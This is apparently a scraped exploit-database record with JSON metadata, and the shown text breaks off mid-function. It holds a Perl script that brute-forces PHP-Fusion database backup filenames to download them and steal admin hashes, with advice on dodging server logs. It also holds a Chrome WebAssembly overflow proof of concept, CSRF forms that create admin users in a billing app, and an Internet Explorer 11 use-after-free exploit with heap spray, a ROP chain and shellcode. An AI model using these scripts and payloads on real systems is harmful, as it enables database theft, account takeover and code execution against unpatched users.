ID 1337DAY-ID-139Type zdtReporter EasyexModified 2005-06-25T00:00:00
Description
Exploit for unknown platform in category web applications
===================================================================
PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit
===================================================================
#!/usr/bin/perl
######################################################
# D A R K A S S A S S I N S C R E W 2 0 0 5 #
######################################################
# Dark Assassins - http://dark-assassins.com/ #
# Visit us on IRC @ irc.tddirc.net #DarkAssassins #
######################################################
# phpfusiondb.pl; Version 0.1 22/06/05 #
# PHP-Fusion db backup proof-of-concept by Easyex #
# Database backup vuln in v6.00.105 and below #
######################################################
# Description: When a db (database) backup is made #
# it is saved in /administration/db_backups/ on 6.0 #
# and on 5.0 it is saved in /fusion_admin/db_backups/#
# The backup file can be saved in 2 formats: .sql or #
# .sql.gz and is hidden by a blank index.php file but#
# can be downloaded client-side, The filename is for #
# example : backup_2005-06-22_2208.sql.gz so what we #
# can do is generate 0001 to 9999 and request the #
# file and download it. If a db file is found an #
# attacker can get the admin hash and crack it or #
# retrieve other sensitive information from the db! #
######################################################
# 9999 requests to the host is alot, And would get noticed in the server log!
# If you re-coded your own script with proxy support you would be fine.
# You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly
# backup the php-fusiondatabase.
my $wget='wget';
my $count='0';
my $target;
if (@ARGV < 4)
{
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";
print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
print "\n";
exit();
}
my $host = $ARGV[0];
my $ver = $ARGV[1];
my $file = $ARGV[2];
my $extension = $ARGV[3];
if ($ver eq "6") {
$dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
}
if ($ver eq "5") {
$dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Host: $host\n";
print "Directory: $dir\n";
print "File: $file + 0001 to 9999\n";
print "Extension: $extension\n";
print "\n";
print "Attempting to find a db backup file on $host\n";
for($count=0;$count<9999;$count++) {
$target=$host.$dir.$file.sprintf("%04d", $count).$extension;
system("$wget $target");
}
# 0day.today [2018-03-03] #
{"published": "2005-06-25T00:00:00", "id": "1337DAY-ID-139", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:45:32", "bulletin": {"published": "2005-06-25T00:00:00", "id": "1337DAY-ID-139", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T01:45:32"}}, "hash": "68e8a2f5104f0ac2be2b4e5edd838a770eb0646ced1f5c30d885c7e9cb8c925f", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:45:32", "edition": 1, "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "href": "http://0day.today/exploit/description/139", "modified": "2005-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 106, "cvelist": [], "sourceHref": "http://0day.today/exploit/139", "references": [], "reporter": "Easyex", "sourceData": "===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db (database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! #\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f872c457a848a124d8dbcf4abd1d80a0", "key": "href"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "109c4f038ba21f3bb58a7da692cdd0b3", "key": "sourceHref"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "83eeb8711945913fc013f598f200302e", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "9242e54907efdcfe3eb4cac572fafd96", "key": "title"}, {"hash": "bc044d4bec3f06d876cf902f1748d6b4", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "eb16723f511ed13c0978e52c0b7539dd42a479eb2ae75a4922ff06def2c7dd78", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-03T03:35:12", "edition": 2, "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "href": "https://0day.today/exploit/description/139", "modified": "2005-06-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 106, "cvelist": [], "sourceHref": "https://0day.today/exploit/139", "references": [], "reporter": "Easyex", "sourceData": "===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db (database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! #\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2018-03-03] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bca49b87b47130c26393f7e65537e693", "key": "href"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "modified"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "bc044d4bec3f06d876cf902f1748d6b4", "key": "reporter"}, {"hash": "1ef4229e749c4c601dbc29d884b994d5", "key": "sourceData"}, {"hash": "b6f80cb0d5f1cd629592c4a17e97db2d", "key": "sourceHref"}, {"hash": "9242e54907efdcfe3eb4cac572fafd96", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {"zdt": [{"lastseen": "2018-06-10T01:34:47", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2018-06-09T00:00:00", "title": "Google Chrome - Integer Overflow when Processing WebAssembly Locals Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-06-10T01:34:47", "vector": "NONE", "value": 2.1}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6092"], "modified": "2018-06-09T00:00:00", "id": "1337DAY-ID-30561", "href": "https://0day.today/exploit/description/30561", "sourceData": "/*\r\nWhen v8 decodes the locals of a function, it performs a check:\r\n \r\nif ((count + type_list->size()) > kV8MaxWasmFunctionLocals) {\r\n decoder->error(decoder->pc() - 1, \"local count too large\");\r\n return false;\r\n }\r\n \r\nOn a 32-bit platform, this check can be bypassed due to an integer overflow. This allows the number of function locals to be large, and can lead to memory corruption when the locals are allocated.\r\n \r\nA PoC is attached. \r\n*/\r\n \r\nvar b2 = new Uint8Array( 171);\r\nb2[0] = 0x0;\r\nb2[1] = 0x61;\r\nb2[2] = 0x73;\r\nb2[3] = 0x6d;\r\nb2[4] = 0x1;\r\nb2[5] = 0x0;\r\nb2[6] = 0x0;\r\nb2[7] = 0x0;\r\nb2[8] = 0x1;\r\nb2[9] = 0xe;\r\nb2[10] = 0x3;\r\nb2[11] = 0x60;\r\nb2[12] = 0x1;\r\nb2[13] = 0x7f;\r\nb2[14] = 0x0;\r\nb2[15] = 0x60;\r\nb2[16] = 0x0;\r\nb2[17] = 0x0;\r\nb2[18] = 0x60;\r\nb2[19] = 0x2;\r\nb2[20] = 0x7f;\r\nb2[21] = 0x7f;\r\nb2[22] = 0x1;\r\nb2[23] = 0x7f;\r\nb2[24] = 0x2;\r\nb2[25] = 0x23;\r\nb2[26] = 0x2;\r\nb2[27] = 0x2;\r\nb2[28] = 0x6a;\r\nb2[29] = 0x73;\r\nb2[30] = 0x3;\r\nb2[31] = 0x6d;\r\nb2[32] = 0x65;\r\nb2[33] = 0x6d;\r\nb2[34] = 0x2;\r\nb2[35] = 0x0;\r\nb2[36] = 0x1;\r\nb2[37] = 0x7;\r\nb2[38] = 0x69;\r\nb2[39] = 0x6d;\r\nb2[40] = 0x70;\r\nb2[41] = 0x6f;\r\nb2[42] = 0x72;\r\nb2[43] = 0x74;\r\nb2[44] = 0x73;\r\nb2[45] = 0xd;\r\nb2[46] = 0x69;\r\nb2[47] = 0x6d;\r\nb2[48] = 0x70;\r\nb2[49] = 0x6f;\r\nb2[50] = 0x72;\r\nb2[51] = 0x74;\r\nb2[52] = 0x65;\r\nb2[53] = 0x64;\r\nb2[54] = 0x5f;\r\nb2[55] = 0x66;\r\nb2[56] = 0x75;\r\nb2[57] = 0x6e;\r\nb2[58] = 0x63;\r\nb2[59] = 0x0;\r\nb2[60] = 0x0;\r\nb2[61] = 0x3;\r\nb2[62] = 0x3;\r\nb2[63] = 0x2;\r\nb2[64] = 0x1;\r\nb2[65] = 0x2;\r\nb2[66] = 0x7;\r\nb2[67] = 0x1e;\r\nb2[68] = 0x2;\r\nb2[69] = 0xd;\r\nb2[70] = 0x65;\r\nb2[71] = 0x78;\r\nb2[72] = 0x70;\r\nb2[73] = 0x6f;\r\nb2[74] = 0x72;\r\nb2[75] = 0x74;\r\nb2[76] = 0x65;\r\nb2[77] = 0x64;\r\nb2[78] = 0x5f;\r\nb2[79] = 0x66;\r\nb2[80] = 0x75;\r\nb2[81] = 0x6e;\r\nb2[82] = 0x63;\r\nb2[83] = 0x0;\r\nb2[84] = 0x1;\r\nb2[85] = 0xa;\r\nb2[86] = 0x61;\r\nb2[87] = 0x63;\r\nb2[88] = 0x63;\r\nb2[89] = 0x75;\r\nb2[90] = 0x6d;\r\nb2[91] = 0x75;\r\nb2[92] = 0x6c;\r\nb2[93] = 0x61;\r\nb2[94] = 0x74;\r\nb2[95] = 0x65;\r\nb2[96] = 0x0;\r\nb2[97] = 0x2;\r\nb2[98] = 0xa;\r\nb2[99] = 0x47;\r\nb2[100] = 0x2;\r\nb2[101] = 0x6;\r\nb2[102] = 0x0;\r\nb2[103] = 0x41;\r\nb2[104] = 0x2a;\r\nb2[105] = 0x10;\r\nb2[106] = 0x0;\r\nb2[107] = 0xb;\r\nb2[108] = 0x3e;\r\nb2[109] = 0x1;\r\nb2[110] = 0xff;\r\nb2[111] = 0xff;\r\nb2[112] = 0xff;\r\nb2[113] = 0xff;\r\nb2[114] = 0x0f;\r\nb2[115] = 0x7f;\r\nb2[116] = 0x20;\r\nb2[117] = 0x0;\r\nb2[118] = 0x20;\r\nb2[119] = 0x1;\r\nb2[120] = 0x41;\r\nb2[121] = 0x4;\r\nb2[122] = 0x6c;\r\nb2[123] = 0x6a;\r\nb2[124] = 0x21;\r\nb2[125] = 0x2;\r\nb2[126] = 0x2;\r\nb2[127] = 0x40;\r\nb2[128] = 0x3;\r\nb2[129] = 0x40;\r\nb2[130] = 0x20;\r\nb2[131] = 0x0;\r\nb2[132] = 0x20;\r\nb2[133] = 0x2;\r\nb2[134] = 0x46;\r\nb2[135] = 0xd;\r\nb2[136] = 0x1;\r\nb2[137] = 0x41;\r\nb2[138] = 0x2a;\r\nb2[139] = 0x10;\r\nb2[140] = 0x0;\r\nb2[141] = 0x20;\r\nb2[142] = 0x3;\r\nb2[143] = 0x41;\r\nb2[144] = 0xc4;\r\nb2[145] = 0x0;\r\nb2[146] = 0x20;\r\nb2[147] = 0x0;\r\nb2[148] = 0x36;\r\nb2[149] = 0x2;\r\nb2[150] = 0x0;\r\nb2[151] = 0x41;\r\nb2[152] = 0xc4;\r\nb2[153] = 0x0;\r\nb2[154] = 0x6a;\r\nb2[155] = 0x21;\r\nb2[156] = 0x3;\r\nb2[157] = 0x20;\r\nb2[158] = 0x0;\r\nb2[159] = 0x41;\r\nb2[160] = 0x4;\r\nb2[161] = 0x6a;\r\nb2[162] = 0x21;\r\nb2[163] = 0x0;\r\nb2[164] = 0xc;\r\nb2[165] = 0x0;\r\nb2[166] = 0xb;\r\nb2[167] = 0xb;\r\nb2[168] = 0x20;\r\nb2[169] = 0x3;\r\nb2[170] = 0xb;\r\n \r\nfunction f(){print(\"in f\");}\r\nvar memory = new WebAssembly.Memory({initial:1, maximum:1});\r\nvar mod = new WebAssembly.Module(b2);\r\nvar i = new WebAssembly.Instance(mod, { imports : {imported_func : f}, js : {mem : memory}});\r\ni.exports.accumulate.call(0, 5);\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30561"}, {"lastseen": "2018-05-30T01:04:41", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Divya Jain", "published": "2018-05-29T00:00:00", "title": "EasyService Billing 1.0 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-05-30T01:04:41", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11442", "CVE-2018-11445"], "modified": "2018-05-29T00:00:00", "id": "1337DAY-ID-30486", "href": "https://0day.today/exploit/description/30486", "sourceData": "<!--\r\n# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery\r\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \r\n# Exploit Author: Divya Jain\r\n# Version: EasyService Billing 1.0 \r\n# CVE: CVE-2018-11445,CVE-2018-11442\r\n# Category: Webapps\r\n# Severity: Medium\r\n# Tested on: KaLi LinuX_x64\r\n# # # # # # # #\r\n#\r\n# Proof of Concept:\r\n //////////////////////////\r\n / CSRF in Quotation Page /\r\n //////////////////////////\r\n# Initial Request:\r\n \r\nPOST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1\r\nHost: test.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139\r\nCookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 86\r\n \r\nquotation_id=139"ation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1\r\n \r\n# CSRF POC:\r\n \r\n<html>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139\" method=\"POST\">\r\n <input type=\"hidden\" name=\"quotation_id\" value=\"139\" />\r\n <input type=\"hidden\" name=\"quotation_no\" value=\"249\" />\r\n <input type=\"hidden\" name=\"des\" value=\"testnew\" />\r\n <input type=\"hidden\" name=\"button\" value=\"Save\" />\r\n <input type=\"hidden\" name=\"MM_update\" value=\"form1\" />\r\n <input type=\"hidden\" name=\"MM_insert\" value=\"form1\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n ///////////////////////////\r\n // CSRF in User Add Page //\r\n ///////////////////////////\r\n \r\n# Initial Request\r\n \r\nPOST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1\r\nHost: test.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://test.com/EasyServiceBilling/system-settings-user-new2.php\r\nCookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 36\r\n \r\ntype=Admin&un=a&pw=b&MM_insert=form1\r\n \r\n# CSRF POC\r\n \r\n<html>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"http://test.com/EasyServiceBilling/system-settings-user-new2.php?\" method=\"POST\">\r\n <input type=\"hidden\" name=\"type\" value=\"Admin\" />\r\n <input type=\"hidden\" name=\"un\" value=\"adminTest\" />\r\n <input type=\"hidden\" name=\"pw\" value=\"adminTest\" />\r\n <input type=\"hidden\" name=\"MM_insert\" value=\"form1\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n-->\n\n# 0day.today [2018-05-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30486"}, {"lastseen": "2018-05-24T18:03:27", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "checkpoint", "published": "2018-05-24T00:00:00", "title": "Microsoft Internet Explorer 11 #InternetExplorer #IE - javascript Code Execution Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-05-24T18:03:27", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2419"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30433", "href": "https://0day.today/exploit/description/30433", "sourceData": "<html>\r\n<body>\r\n<script>\r\nARR_SIZE = 3248;\r\nfirst_gadget_offsets = [150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476];\r\nstackpivot_gadget_offsets = [122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542];\r\nfirst_gadget = [0x89, 0x41, 0x0c, 0xc3];\r\nstackpivot_gadget = [0x94, 0xc3];\r\ngadget_offsets = {\"stackpivot\": 0, \"g1\": 0, \"g2\": 0};\r\n \r\nfunction empty_replacer(a,b) {\r\n return b;\r\n}\r\n \r\nfunction create_list(lst, depth) {\r\n if (depth > 5)\r\n {\r\n return;\r\n }\r\n else\r\n {\r\n // Creates 19 objects in each nested list\r\n for (i = 0; i <= 19; i++)\r\n {\r\n // Create random string with length 8\r\n for (var val = \"\", c = 0; c <= 8; c++) {\r\n rnd = Math.floor((Math.random() * 90) + 48);\r\n l = String.fromCharCode(rnd);\r\n val = val + l;\r\n }\r\n lst[\"a\" + i] = val;\r\n }\r\n create_list(lst[\"a0\"] = {}, depth + 1);\r\n }\r\n}\r\n \r\nfunction create_triggering_json() {\r\n var lst = {}\r\n create_list(lst, 0);\r\n return lst;\r\n}\r\n \r\n// Create vulnerable JSON\r\ntrig_json = create_triggering_json();\r\n \r\nspray = new Array(4096);\r\nbuff = new ArrayBuffer(4);\r\nsize = 0;\r\n \r\n// Heap Spray\r\nvar I = setInterval(function(){ \r\n for (i=0;i<400;i++,size++) {\r\n spray[size] = new Array(15352);\r\n for (j = 0; j< 85;j++) {\r\n spray[size][j] = new Uint32Array(buff);\r\n }\r\n 0 == i && (yb = spray[0][0][\"length\"], yb[\"toString\"](16))\r\n }\r\n \r\n size >= (4096) && (clearInterval(I), uaf()) \r\n}, 100);\r\n \r\nvar arr = []\r\nfunction uaf()\r\n{\r\n JSON.stringify(trig_json,empty_replacer);\r\n \r\n var pattern = [311357464,311357472,311357464]; \r\n for (var b = 3248 * 2, c = 203; c < b; c++)\r\n arr[c] = new ArrayBuffer(12);\r\n \r\n for (c = 203; c < b; c++)\r\n {\r\n var data = new Uint32Array(arr[c],0);\r\n a = 0;\r\n for (var i = data[\"length\"] / pattern[\"length\"]; a < i; a++)\r\n for (var d=0, e = pattern[\"length\"]; d < e;d++) \r\n data[a+d] = pattern[d];\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n search_corrupted_array();\r\n}\r\n \r\nvar damaged_array;\r\nfunction search_corrupted_array()\r\n{\r\n for (i=0;i<4096;i++) \r\n {\r\n for (j = 0; j< 85;j++) {\r\n if (spray[i][j].length != 1)\r\n {\r\n damaged_array = spray[i][j];\r\n damaged_array[1] = 0x7fffffff; // Set array to include almost entire user-space\r\n damaged_array[2] = 0x10000;\r\n \r\n write_dword_to_addr(damaged_array, 0x128e0020, 0xDEC0DE * 2 | 1); // Mark the first element of one of the arrays, to find it later\r\n for (k = 0; k < 4096; k++) { // find the marked array\r\n if (spray[k][0] == 0xDEC0DE) {\r\n break;\r\n }\r\n }\r\n // now spray[k][0] is 0x128e0020\r\n if (k == 4096) break;\r\n spray[k][2] = new Array(1); // creates a native integer array, pointed by 0x128e0028\r\n spray[k][2][0] = new ArrayBuffer(0xc); // turns the array to be JavascriptArray\r\n arr_obj = read_dword_from_addr(damaged_array, 0x128e0028); // address of the new JavascriptArray object\r\n jscript9_base_addr = read_dword_from_addr(damaged_array, arr_obj) & 0xffff0000; // read the first dword of the JavascriptArray object, which is the vftable pointer, null the lower word to get jscript9 base address\r\n vp_addr = get_vp_addr(damaged_array, jscript9_base_addr); // virtual address of kernel32!VirtualProtectStub\r\n if (vp_addr == 0) break;\r\n arrbuf = new ArrayBuffer(0x5000); // this buffer will contain the ROP chain\r\n spray[k][0] = new Uint32Array(arrbuf); // Uint32Array that is a view to the arraybuffer above, pointed by 0x128e0020\r\n rc_buf_ui32_obj = read_dword_from_addr(damaged_array, 0x128e0020); // address of the Uint32Array object\r\n rc_buf_ui32_data = read_dword_from_addr(damaged_array, rc_buf_ui32_obj + 0x20); // address of first element of Uint32Array above\r\n var shellcode_caller = [0x53, 0x55, 0x56, 0xe8, 0x09, 0x00, 0x00, 0x00, 0x5e, 0x5d, 0x5b, 0x8b, 0x63, 0x0c, 0xc2, 0x0c, 0x00, 0x90];\r\n var shellcode = [96, 49, 210, 82, 104, 99, 97, 108, 99, 84, 89, 82, 81, 100, 139, 114, 48, 139, 118, 12, 139, 118, 12, 173, 139, 48, 139, 126, 24, 139, 95, 60, 139, 92, 31, 120, 139, 116, 31, 32, 1, 254, 139, 84, 31, 36, 15, 183, 44, 23, 66, 66, 173, 129, 60, 7, 87, 105, 110, 69, 117, 240, 139, 116, 31, 28, 1, 254, 3, 60, 174, 255, 215, 88, 88, 97, 195]; // open calc.exe shellcode\r\n spray[k][1] = new Uint8Array(shellcode_caller.concat(shellcode)); // shellcode, pointed by 0x128e0024\r\n sc_obj = read_dword_from_addr(damaged_array, 0x128e0024); // address of the Uint8Array object containing the shellcode\r\n sc_data = read_dword_from_addr(damaged_array, sc_obj + 0x20); // address of the shellcode buffer itself\r\n construct_gadget_dict(damaged_array, jscript9_base_addr);\r\n \r\n // construct the ROP chain\r\n spray[k][0][0] = jscript9_base_addr + gadget_offsets[\"g1\"]; // mov dword ptr [ecx+0c], eax # ret\r\n spray[k][0][1] = jscript9_base_addr + gadget_offsets[\"g2\"]; // ret\r\n spray[k][0][2] = vp_addr; // VirtualProtectStub pointer\r\n spray[k][0][3] = sc_data; // shellcode address (return address to which we return after VirtualProtect)\r\n spray[k][0][4] = sc_data; // lpAddress\r\n spray[k][0][5] = spray[k][1].length; // dwSize\r\n spray[k][0][6] = 0x40; // flNewProtect = PAGE_EXECUTE_READWRITE\r\n spray[k][0][7] = rc_buf_ui32_data + 0x20; // lpflOldProtect\r\n spray[k][0][0x90 / 4] = jscript9_base_addr + gadget_offsets[\"stackpivot\"]; // stackpivot gadget in offset 0x90 from ROP chain top\r\n write_dword_to_addr(damaged_array, arr_obj, rc_buf_ui32_data); // overwrite the JavascriptArray object's vftable pointer with the address of the ROP chain\r\n spray[k][2][0] = 0; // set the first item of the overwritten JavascriptArray object, triggering the call to JavascriptArray::SetItem. since the vftable is now the ROP chain, and SetItem is in offset 0x90 in the original vftable, this will trigger the stackpivot gadget\r\n }\r\n }\r\n }\r\n}\r\n \r\nfunction get_index_from_addr(addr) {\r\n return Math.floor((addr - 0x10000) / 4);\r\n}\r\n \r\nfunction get_iat_offset(arr, js9_base) {\r\n return 0x3e6000;\r\n}\r\n \r\nfunction 